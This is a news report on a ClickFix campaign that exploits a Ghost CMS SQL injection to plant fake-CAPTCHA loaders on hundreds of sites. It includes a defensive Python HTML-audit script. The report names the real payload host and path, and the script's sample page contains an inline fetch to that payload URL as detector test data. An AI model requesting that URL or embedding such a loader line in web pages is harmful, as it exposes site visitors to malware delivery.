Concise Cyber

Ghost CMS SQL Injection Vulnerability Fuels ClickFix Campaign Targeting 700+ Websites

A significant cybersecurity incident is underway, with threat actors actively exploiting a SQL injection vulnerability in the popular Ghost CMS platform. The vulnerability, identified as CVE-2026-26980, has been leveraged in a large-scale ClickFix campaign that has compromised over 700 websites across multiple sectors. Malicious activity was first detected on May 7, 2026, and is particularly concerning given the widespread use of Ghost CMS for blogs and online publications.

According to cybersecurity researchers, the vulnerability allows unauthorized access to Ghost CMS admin API keys. Once inside, attackers inject malicious JavaScript loaders at the bottom of pages. These loaders facilitate fake CAPTCHA attacks, a tactic designed to trick users into interacting with deceptive prompts. The attackers utilize a cloaking service, Adspect, to bypass security scanners and evade detection, making it more difficult to identify and block the malicious activity.

The attack chain involves a complex series of steps, beginning with the exploitation of CVE-2026-26980 to steal admin API keys. Subsequently, a traffic distribution script using Adspect is deployed, delivering payloads via clo4shara[.]xyz/11z77u3.php. A fake CAPTCHA is rendered in an HTML iframe element, and Base64-encoded commands are executed via the Windows Run dialog. This leads to the dropping of DLL/JavaScript payloads and the execution of a Windows executable.
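For site owners checking their own pages, the following is an added example (not code from Ghost or from the researchers) that audits rendered HTML for script and iframe sources outside an allowlist and for references to the host named above. The function names, the allowlist, the finding labels and the sample page are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Host from the article's IoC, kept defanged in source and refanged only for matching.
IOC_HOSTS = {"clo4shara[.]xyz".replace("[.]", ".")}

class LoaderAudit(HTMLParser):
    """Record external <script>/<iframe> hosts and inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag in ("script", "iframe") and src:
            host = urlparse(src).hostname      # None for site-relative paths
            if host:
                self.external.append((tag, host.lower(), self.getpos()[0]))
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append((data, self.getpos()[0]))

def audit_page(html, site_host, allowed_hosts):
    """Return (kind, tag, host, line) findings for one rendered page."""
    p = LoaderAudit()
    p.feed(html)
    p.close()
    findings = []
    for tag, host, line in p.external:
        if any(host == h or host.endswith("." + h) for h in IOC_HOSTS):
            findings.append(("ioc", tag, host, line))
        elif host != site_host and host not in allowed_hosts:
            findings.append(("unlisted", tag, host, line))
    for body, line in p.inline:
        findings += [("ioc-inline", "script", h, line) for h in IOC_HOSTS if h in body.lower()]
    return findings

# Constructed sample page (not captured from a real site); hosts are placeholders.
SAMPLE = """<html><body><article>post</article>
<script src="/assets/built/site.js"></script>
<script src="https://cdn.jsdelivr.net/npm/x/y.js"></script>
<script src="//static.loader.example/a.js"></script>
<script>fetch("https://%s/11z77u3.php")</script>
</body></html>""" % next(iter(IOC_HOSTS))
```

Because the article says the loaders are cloaked from security scanners, a clean result from a server-side fetch does not rule out injection; run the same check over HTML saved from a normal browser session as well.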

The final stage of the ClickFix flow involves a fake Cloudflare/CAPTCHA dialog, further deceiving users and leading them to unknowingly execute Windows commands via PowerShell or the Run dialog. Anthropic, leveraging the Claude AI model, was instrumental in discovering this vulnerability. The Ghost CMS developers addressed the vulnerability in a recent update, version 6.19.1.

Security professionals are urging Ghost CMS users to immediately update to the latest version to mitigate the risk of compromise. The widespread nature of this campaign, targeting over 700 websites, underscores the importance of prompt patching and robust security practices for all CMS platforms. QiAnXin XLab, along with other security vendors, is actively tracking and analyzing this evolving threat.

This incident highlights the ongoing risks associated with vulnerabilities in open-source software and the importance of proactive security measures. Organizations using Ghost CMS, including those at Harvard University, Oxford University, and Auburn University, should prioritize patching and monitoring their systems for signs of compromise. The use of cloaking services like Adspect further complicates detection and remediation efforts, requiring a layered security approach involving both technical controls and user awareness training. Users should be wary of suspicious CAPTCHA prompts and avoid interacting with unfamiliar or unexpected dialogs.
